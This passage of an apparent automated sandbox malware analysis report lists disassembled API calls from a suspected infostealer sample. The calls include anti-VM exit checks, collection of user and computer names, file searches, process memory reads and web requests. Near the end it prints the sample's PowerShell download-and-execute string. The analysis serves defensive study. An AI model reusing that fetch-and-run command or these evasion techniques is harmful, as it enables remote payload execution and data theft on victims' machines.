                                            • RegCloseKey.ADVAPI32(?), ref: 024045D9
                                            • lstrcat.KERNEL32(?,00000000), ref: 024045FE
                                            • lstrcat.KERNEL32(?,006D6B68), ref: 02404612
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                            • String ID:
                                            • API String ID: 2623679115-0
                                            • Opcode ID: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
                                            • Instruction ID: 2e98f864dc180dff19901595af922e623191513eb3b5d222be59e20dc0a7afe0
                                            • Opcode Fuzzy Hash: 999cfbed4ff8a03412d5231f3ea01ef0dc387c4afc54b3402d2d603eb4b95bc4
                                            • Instruction Fuzzy Hash: D4414B76D00108ABDB14FBA0ED95FEE733AAB48300F04455EB769561C0EA75578C8FE1
                                            APIs
                                            • strtok_s.MSVCRT ref: 004137D8
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • strtok_s.MSVCRT ref: 00413921
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,00A6DD90,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpystrtok_s$lstrlen
                                            • String ID:
                                            • API String ID: 3184129880-0
                                            • Opcode ID: 2c66abec2bd4a2ca17be66da4dca2020188b6c17f291cc5ff4630984ccd5f22a
                                            • Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
                                            • Opcode Fuzzy Hash: 2c66abec2bd4a2ca17be66da4dca2020188b6c17f291cc5ff4630984ccd5f22a
                                            • Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA
                                            APIs
                                            • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 023F9CD1
                                            • InternetOpenUrlA.WININET(00000000,00421250,00000000,00000000,80000000,00000000), ref: 023F9D12
                                            • InternetCloseHandle.WININET(00000000), ref: 023F9D2E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$Open$CloseHandle
                                            • String ID:
                                            • API String ID: 3289985339-0
                                            • Opcode ID: 17ff0f5a9049df77a866354e3abf0ac28466d12122aa9a0dab184debf790f5b3
                                            • Instruction ID: 2fa1fff9f830fc38c51ad30024985d106d9ffe4bf70d06857a1f72e9cb475237
                                            • Opcode Fuzzy Hash: 17ff0f5a9049df77a866354e3abf0ac28466d12122aa9a0dab184debf790f5b3
                                            • Instruction Fuzzy Hash: 21417C31A10258EBCB14EF94DC84FDDB7B9AB48740F5050AAF645BB190DBB4AE80CF64
                                            APIs
                                            • __lock.LIBCMT ref: 0041B69A
                                              • Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
                                              • Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
                                              • Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B2E6
                                            • DecodePointer.KERNEL32(0042A260,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
                                            • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B6E7
                                              • Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138
                                            • DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B70D
                                            • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B720
                                            • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B72A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                            • String ID:
                                            • API String ID: 2005412495-0
                                            • Opcode ID: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
                                            • Instruction ID: f2b3184d1a1304bb90a50cba908fab2f5b5379eafeb7e6c0534b29cc51b1fef6
                                            • Opcode Fuzzy Hash: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
                                            • Instruction Fuzzy Hash: 1331F974900349DFDF11AFA5D9856DDBAF1FF88314F14402BE460A62A0DB784985CF99
                                            APIs
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 02409E58
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 02409E71
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 02409E89
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 02409EA1
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 02409EBA
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 02409ED2
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 02409EEA
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 02409F03
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 02409F1B
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 02409F33
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 02409F4C
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 02409F64
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 02409F7C
                                              • Part of subcall function 02409E17: GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 02409F95
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 023F1437: ExitProcess.KERNEL32 ref: 023F1478
                                              • Part of subcall function 023F13C7: GetSystemInfo.KERNEL32(?), ref: 023F13D1
                                              • Part of subcall function 023F13C7: ExitProcess.KERNEL32 ref: 023F13E5
                                              • Part of subcall function 023F1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 023F1392
                                              • Part of subcall function 023F1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 023F1399
                                              • Part of subcall function 023F1377: ExitProcess.KERNEL32 ref: 023F13AA
                                              • Part of subcall function 023F1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 023F14A5
                                              • Part of subcall function 023F1487: __aulldiv.LIBCMT ref: 023F14BF
                                              • Part of subcall function 023F1487: __aulldiv.LIBCMT ref: 023F14CD
                                              • Part of subcall function 023F1487: ExitProcess.KERNEL32 ref: 023F14FB
                                              • Part of subcall function 02406C77: GetUserDefaultLangID.KERNEL32 ref: 02406C7B
                                              • Part of subcall function 023F13F7: ExitProcess.KERNEL32 ref: 023F142D
                                              • Part of subcall function 02407C47: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,023F141E), ref: 02407C77
                                              • Part of subcall function 02407C47: RtlAllocateHeap.NTDLL(00000000), ref: 02407C7E
                                              • Part of subcall function 02407C47: GetUserNameA.ADVAPI32(00000104,00000104), ref: 02407C96
                                              • Part of subcall function 02407CD7: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02407D07
                                              • Part of subcall function 02407CD7: RtlAllocateHeap.NTDLL(00000000), ref: 02407D0E
                                              • Part of subcall function 02407CD7: GetComputerNameA.KERNEL32(?,00000104), ref: 02407D26
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02406FD1
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02406FEF
                                            • CloseHandle.KERNEL32(00000000), ref: 02407000
                                            • Sleep.KERNEL32(00001770), ref: 0240700B
                                            • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02407021
                                            • ExitProcess.KERNEL32 ref: 02407029
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2525456742-0
                                            • Opcode ID: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
                                            • Instruction ID: 16d29935dcb61ba582a100cae3d6c8005609dd2e296d94684ee1f61d1c9334af
                                            • Opcode Fuzzy Hash: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
                                            • Instruction Fuzzy Hash: C0312C71A44214AACB04FBE1EC94EFEB77BAF54301F50453EA252A21D0EF746985CE62
                                            APIs
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                            • ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                            • LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                            • CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                            • String ID:
                                            • API String ID: 2311089104-0
                                            • Opcode ID: e124faafaf4e289e5d0c391c268fcc7043a292ff11b19f333ed3c72ccf35b9d9
                                            • Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
                                            • Opcode Fuzzy Hash: e124faafaf4e289e5d0c391c268fcc7043a292ff11b19f333ed3c72ccf35b9d9
                                            • Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6
                                            APIs
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023FA3A3
                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 023FA3C8
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 023FA3E8
                                            • ReadFile.KERNEL32(000000FF,?,00000000,023F16F6,00000000), ref: 023FA411
                                            • LocalFree.KERNEL32(023F16F6), ref: 023FA447
                                            • CloseHandle.KERNEL32(000000FF), ref: 023FA451
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                            • String ID:
                                            • API String ID: 2311089104-0
                                            • Opcode ID: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
                                            • Instruction ID: a9e6545a1048fa5fd0b40162e33fef5f1b894b2152f6e31f514d8f49d74b9345
                                            • Opcode Fuzzy Hash: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
                                            • Instruction Fuzzy Hash: 7D31EAB4A00209EFDB14CFA4E889FAE77B5BF48704F108159ED15A7390D774AA81CFA1
                                            APIs
                                            • __getptd.LIBCMT ref: 0041CD1A
                                              • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                              • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                            • __amsg_exit.LIBCMT ref: 0041CD3A
                                            • __lock.LIBCMT ref: 0041CD4A
                                            • InterlockedDecrement.KERNEL32(?), ref: 0041CD67
                                            • free.MSVCRT ref: 0041CD7A
                                            • InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                            • String ID:
                                            • API String ID: 634100517-0
                                            • Opcode ID: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                            • Instruction ID: 81166cf5a2c435bb4aac1af76a8190dca09a737386ef4d0c79be19083c51ecfa
                                            • Opcode Fuzzy Hash: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                            • Instruction Fuzzy Hash: C2018835A817219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD
                                            APIs
                                            • __getptd.LIBCMT ref: 0240CF81
                                              • Part of subcall function 0240C507: __getptd_noexit.LIBCMT ref: 0240C50A
                                              • Part of subcall function 0240C507: __amsg_exit.LIBCMT ref: 0240C517
                                            • __amsg_exit.LIBCMT ref: 0240CFA1
                                            • __lock.LIBCMT ref: 0240CFB1
                                            • InterlockedDecrement.KERNEL32(?), ref: 0240CFCE
                                            • free.MSVCRT ref: 0240CFE1
                                            • InterlockedIncrement.KERNEL32(0042C980), ref: 0240CFF9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                            • String ID:
                                            • API String ID: 634100517-0
                                            • Opcode ID: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
                                            • Instruction ID: a4e56fe9753c9d692041cb9c57a23a5c2fc11743a4ed306a480aea0e3404e33a
                                            • Opcode Fuzzy Hash: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
                                            • Instruction Fuzzy Hash: 71016175A01621DBCB21AB6AD4C4B5EB7A1FF04718F04423BE815A76C0C73869C2DFDA
                                            APIs
                                            • strlen.MSVCRT ref: 0041719F
                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD
                                              • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
                                              • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85
                                            • VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333
                                              • Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                            • String ID: @
                                            • API String ID: 2950663791-2766056989
                                            • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
                                            • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5
                                            APIs
                                            • strlen.MSVCRT ref: 02407406
                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,02407681,00000000,00420BB0,00000000,00000000), ref: 02407434
                                              • Part of subcall function 024070B7: strlen.MSVCRT ref: 024070C8
                                              • Part of subcall function 024070B7: strlen.MSVCRT ref: 024070EC
                                            • VirtualQueryEx.KERNEL32(024077F4,00000000,?,0000001C), ref: 02407479
                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02407681), ref: 0240759A
                                              • Part of subcall function 024072C7: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 024072DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                            • String ID: @
                                            • API String ID: 2950663791-2766056989
                                            • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction ID: 8d9128e93a8e2e7419967d85541121e2777d341d9ee75492ce91c0e2a65a30c8
                                            • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction Fuzzy Hash: 1451D8B5E00109ABDB04CF99D991AEFB7B6BF88300F148569F915A7380D734EA51CBA1
                                            APIs
                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID: zn@$zn@
                                            • API String ID: 1029625771-1156428846
                                            • Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                            • Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
                                            • Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                            • Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95
                                            APIs
                                            • lstrcat.KERNEL32(?,006D6D0C), ref: 02404C92
                                              • Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202
                                            • lstrcat.KERNEL32(?,00000000), ref: 02404CB8
                                            • lstrcat.KERNEL32(?,?), ref: 02404CD7
                                            • lstrcat.KERNEL32(?,?), ref: 02404CEB
                                            • lstrcat.KERNEL32(?,006D6C84), ref: 02404CFE
                                            • lstrcat.KERNEL32(?,?), ref: 02404D12
                                            • lstrcat.KERNEL32(?,006D6CC8), ref: 02404D26
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 02409187: GetFileAttributesA.KERNEL32(00000000,?,023F1DFB,?,?,00425784,?,?,00420E22), ref: 02409196
                                              • Part of subcall function 02404A27: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02404A37
                                              • Part of subcall function 02404A27: RtlAllocateHeap.NTDLL(00000000), ref: 02404A3E
                                              • Part of subcall function 02404A27: wsprintfA.USER32 ref: 02404A5D
                                              • Part of subcall function 02404A27: FindFirstFileA.KERNEL32(?,?), ref: 02404A74
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                            • String ID:
                                            • API String ID: 2540262943-0
                                            • Opcode ID: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                            • Instruction ID: 7b8b47ce20828c971a3407947ced55177a4052b39cab39374b774c6b73c7645e
                                            • Opcode Fuzzy Hash: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                            • Instruction Fuzzy Hash: AF314EB6D00218A7DB24EBB0DCC4EE9733AAF58700F44469EB75596090EA749BC88F91
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5
                                            Strings
                                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
                                            • ')", xrefs: 00412F03
                                            • <, xrefs: 00412F89
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            • API String ID: 3031569214-898575020
                                            • Opcode ID: f5c2a12c145dcaa2db7d0abea027a0bbac224cbe30c9f346d8a6323810ab9f2c
                                            • Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
                                            • Opcode Fuzzy Hash: f5c2a12c145dcaa2db7d0abea027a0bbac224cbe30c9f346d8a6323810ab9f2c
                                            • Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99
                                            APIs
